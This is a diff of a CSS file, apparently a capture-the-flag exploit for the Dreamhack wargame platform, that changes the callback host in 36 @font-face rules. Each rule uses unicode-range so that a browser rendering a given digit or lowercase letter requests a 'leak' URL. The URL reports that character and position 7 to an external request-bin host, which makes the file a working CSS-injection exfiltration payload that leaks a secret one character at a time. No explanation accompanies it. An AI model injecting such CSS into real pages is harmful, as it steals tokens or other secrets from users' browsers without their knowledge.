--- a/css.css
+++ b/css.css
@@ -5,41 +5,41 @@
 }
 
 /* 0-9일 경우 */
-@font-face { font-family: LeakFont; src: url("https://rnuplzu.request.dreamhack.games/leak?pos=7&char=0"); unicode-range: U+0030; }
-@font-face { font-family: LeakFont; src: url("https://rnuplzu.request.dreamhack.games/leak?pos=7&char=1"); unicode-range: U+0031; }
-@font-face { font-family: LeakFont; src: url("https://rnuplzu.request.dreamhack.games/leak?pos=7&char=2"); unicode-range: U+0032; }
-@font-face { font-family: LeakFont; src: url("https://rnuplzu.request.dreamhack.games/leak?pos=7&char=3"); unicode-range: U+0033; }
-@font-face { font-family: LeakFont; src: url("https://rnuplzu.request.dreamhack.games/leak?pos=7&char=4"); unicode-range: U+0034; }
-@font-face { font-family: LeakFont; src: url("https://rnuplzu.request.dreamhack.games/leak?pos=7&char=5"); unicode-range: U+0035; }
-@font-face { font-family: LeakFont; src: url("https://rnuplzu.request.dreamhack.games/leak?pos=7&char=6"); unicode-range: U+0036; }
-@font-face { font-family: LeakFont; src: url("https://rnuplzu.request.dreamhack.games/leak?pos=7&char=7"); unicode-range: U+0037; }
-@font-face { font-family: LeakFont; src: url("https://rnuplzu.request.dreamhack.games/leak?pos=7&char=8"); unicode-range: U+0038; }
-@font-face { font-family: LeakFont; src: url("https://rnuplzu.request.dreamhack.games/leak?pos=7&char=9"); unicode-range: U+0039; }
+@font-face { font-family: LeakFont; src: url("https://hjrxlsn.request.dreamhack.games/leak?pos=7&char=0"); unicode-range: U+0030; }
+@font-face { font-family: LeakFont; src: url("https://hjrxlsn.request.dreamhack.games/leak?pos=7&char=1"); unicode-range: U+0031; }
+@font-face { font-family: LeakFont; src: url("https://hjrxlsn.request.dreamhack.games/leak?pos=7&char=2"); unicode-range: U+0032; }
+@font-face { font-family: LeakFont; src: url("https://hjrxlsn.request.dreamhack.games/leak?pos=7&char=3"); unicode-range: U+0033; }
+@font-face { font-family: LeakFont; src: url("https://hjrxlsn.request.dreamhack.games/leak?pos=7&char=4"); unicode-range: U+0034; }
+@font-face { font-family: LeakFont; src: url("https://hjrxlsn.request.dreamhack.games/leak?pos=7&char=5"); unicode-range: U+0035; }
+@font-face { font-family: LeakFont; src: url("https://hjrxlsn.request.dreamhack.games/leak?pos=7&char=6"); unicode-range: U+0036; }
+@font-face { font-family: LeakFont; src: url("https://hjrxlsn.request.dreamhack.games/leak?pos=7&char=7"); unicode-range: U+0037; }
+@font-face { font-family: LeakFont; src: url("https://hjrxlsn.request.dreamhack.games/leak?pos=7&char=8"); unicode-range: U+0038; }
+@font-face { font-family: LeakFont; src: url("https://hjrxlsn.request.dreamhack.games/leak?pos=7&char=9"); unicode-range: U+0039; }
 
 /* a-z일 경우 */
-@font-face { font-family: LeakFont; src: url("https://rnuplzu.request.dreamhack.games/leak?pos=7&char=a"); unicode-range: U+0061; }
-@font-face { font-family: LeakFont; src: url("https://rnuplzu.request.dreamhack.games/leak?pos=7&char=b"); unicode-range: U+0062; }
-@font-face { font-family: LeakFont; src: url("https://rnuplzu.request.dreamhack.games/leak?pos=7&char=c"); unicode-range: U+0063; }
-@font-face { font-family: LeakFont; src: url("https://rnuplzu.request.dreamhack.games/leak?pos=7&char=d"); unicode-range: U+0064; }
-@font-face { font-family: LeakFont; src: url("https://rnuplzu.request.dreamhack.games/leak?pos=7&char=e"); unicode-range: U+0065; }
-@font-face { font-family: LeakFont; src: url("https://rnuplzu.request.dreamhack.games/leak?pos=7&char=f"); unicode-range: U+0066; }
-@font-face { font-family: LeakFont; src: url("https://rnuplzu.request.dreamhack.games/leak?pos=7&char=g"); unicode-range: U+0067; }
-@font-face { font-family: LeakFont; src: url("https://rnuplzu.request.dreamhack.games/leak?pos=7&char=h"); unicode-range: U+0068; }
-@font-face { font-family: LeakFont; src: url("https://rnuplzu.request.dreamhack.games/leak?pos=7&char=i"); unicode-range: U+0069; }
-@font-face { font-family: LeakFont; src: url("https://rnuplzu.request.dreamhack.games/leak?pos=7&char=j"); unicode-range: U+006A; }
-@font-face { font-family: LeakFont; src: url("https://rnuplzu.request.dreamhack.games/leak?pos=7&char=k"); unicode-range: U+006B; }
-@font-face { font-family: LeakFont; src: url("https://rnuplzu.request.dreamhack.games/leak?pos=7&char=l"); unicode-range: U+006C; }
-@font-face { font-family: LeakFont; src: url("https://rnuplzu.request.dreamhack.games/leak?pos=7&char=m"); unicode-range: U+006D; }
-@font-face { font-family: LeakFont; src: url("https://rnuplzu.request.dreamhack.games/leak?pos=7&char=n"); unicode-range: U+006E; }
-@font-face { font-family: LeakFont; src: url("https://rnuplzu.request.dreamhack.games/leak?pos=7&char=o"); unicode-range: U+006F; }
-@font-face { font-family: LeakFont; src: url("https://rnuplzu.request.dreamhack.games/leak?pos=7&char=p"); unicode-range: U+0070; }
-@font-face { font-family: LeakFont; src: url("https://rnuplzu.request.dreamhack.games/leak?pos=7&char=q"); unicode-range: U+0071; }
-@font-face { font-family: LeakFont; src: url("https://rnuplzu.request.dreamhack.games/leak?pos=7&char=r"); unicode-range: U+0072; }
-@font-face { font-family: LeakFont; src: url("https://rnuplzu.request.dreamhack.games/leak?pos=7&char=s"); unicode-range: U+0073; }
-@font-face { font-family: LeakFont; src: url("https://rnuplzu.request.dreamhack.games/leak?pos=7&char=t"); unicode-range: U+0074; }
-@font-face { font-family: LeakFont; src: url("https://rnuplzu.request.dreamhack.games/leak?pos=7&char=u"); unicode-range: U+0075; }
-@font-face { font-family: LeakFont; src: url("https://rnuplzu.request.dreamhack.games/leak?pos=7&char=v"); unicode-range: U+0076; }
-@font-face { font-family: LeakFont; src: url("https://rnuplzu.request.dreamhack.games/leak?pos=7&char=w"); unicode-range: U+0077; }
-@font-face { font-family: LeakFont; src: url("https://rnuplzu.request.dreamhack.games/leak?pos=7&char=x"); unicode-range: U+0078; }
-@font-face { font-family: LeakFont; src: url("https://rnuplzu.request.dreamhack.games/leak?pos=7&char=y"); unicode-range: U+0079; }
-@font-face { font-family: LeakFont; src: url("https://rnuplzu.request.dreamhack.games/leak?pos=7&char=z"); unicode-range: U+007A; }
+@font-face { font-family: LeakFont; src: url("https://hjrxlsn.request.dreamhack.games/leak?pos=7&char=a"); unicode-range: U+0061; }
+@font-face { font-family: LeakFont; src: url("https://hjrxlsn.request.dreamhack.games/leak?pos=7&char=b"); unicode-range: U+0062; }
+@font-face { font-family: LeakFont; src: url("https://hjrxlsn.request.dreamhack.games/leak?pos=7&char=c"); unicode-range: U+0063; }
+@font-face { font-family: LeakFont; src: url("https://hjrxlsn.request.dreamhack.games/leak?pos=7&char=d"); unicode-range: U+0064; }
+@font-face { font-family: LeakFont; src: url("https://hjrxlsn.request.dreamhack.games/leak?pos=7&char=e"); unicode-range: U+0065; }
+@font-face { font-family: LeakFont; src: url("https://hjrxlsn.request.dreamhack.games/leak?pos=7&char=f"); unicode-range: U+0066; }
+@font-face { font-family: LeakFont; src: url("https://hjrxlsn.request.dreamhack.games/leak?pos=7&char=g"); unicode-range: U+0067; }
+@font-face { font-family: LeakFont; src: url("https://hjrxlsn.request.dreamhack.games/leak?pos=7&char=h"); unicode-range: U+0068; }
+@font-face { font-family: LeakFont; src: url("https://hjrxlsn.request.dreamhack.games/leak?pos=7&char=i"); unicode-range: U+0069; }
+@font-face { font-family: LeakFont; src: url("https://hjrxlsn.request.dreamhack.games/leak?pos=7&char=j"); unicode-range: U+006A; }
+@font-face { font-family: LeakFont; src: url("https://hjrxlsn.request.dreamhack.games/leak?pos=7&char=k"); unicode-range: U+006B; }
+@font-face { font-family: LeakFont; src: url("https://hjrxlsn.request.dreamhack.games/leak?pos=7&char=l"); unicode-range: U+006C; }
+@font-face { font-family: LeakFont; src: url("https://hjrxlsn.request.dreamhack.games/leak?pos=7&char=m"); unicode-range: U+006D; }
+@font-face { font-family: LeakFont; src: url("https://hjrxlsn.request.dreamhack.games/leak?pos=7&char=n"); unicode-range: U+006E; }
+@font-face { font-family: LeakFont; src: url("https://hjrxlsn.request.dreamhack.games/leak?pos=7&char=o"); unicode-range: U+006F; }
+@font-face { font-family: LeakFont; src: url("https://hjrxlsn.request.dreamhack.games/leak?pos=7&char=p"); unicode-range: U+0070; }
+@font-face { font-family: LeakFont; src: url("https://hjrxlsn.request.dreamhack.games/leak?pos=7&char=q"); unicode-range: U+0071; }
+@font-face { font-family: LeakFont; src: url("https://hjrxlsn.request.dreamhack.games/leak?pos=7&char=r"); unicode-range: U+0072; }
+@font-face { font-family: LeakFont; src: url("https://hjrxlsn.request.dreamhack.games/leak?pos=7&char=s"); unicode-range: U+0073; }
+@font-face { font-family: LeakFont; src: url("https://hjrxlsn.request.dreamhack.games/leak?pos=7&char=t"); unicode-range: U+0074; }
+@font-face { font-family: LeakFont; src: url("https://hjrxlsn.request.dreamhack.games/leak?pos=7&char=u"); unicode-range: U+0075; }
+@font-face { font-family: LeakFont; src: url("https://hjrxlsn.request.dreamhack.games/leak?pos=7&char=v"); unicode-range: U+0076; }
+@font-face { font-family: LeakFont; src: url("https://hjrxlsn.request.dreamhack.games/leak?pos=7&char=w"); unicode-range: U+0077; }
+@font-face { font-family: LeakFont; src: url("https://hjrxlsn.request.dreamhack.games/leak?pos=7&char=x"); unicode-range: U+0078; }
+@font-face { font-family: LeakFont; src: url("https://hjrxlsn.request.dreamhack.games/leak?pos=7&char=y"); unicode-range: U+0079; }
+@font-face { font-family: LeakFont; src: url("https://hjrxlsn.request.dreamhack.games/leak?pos=7&char=z"); unicode-range: U+007A; }
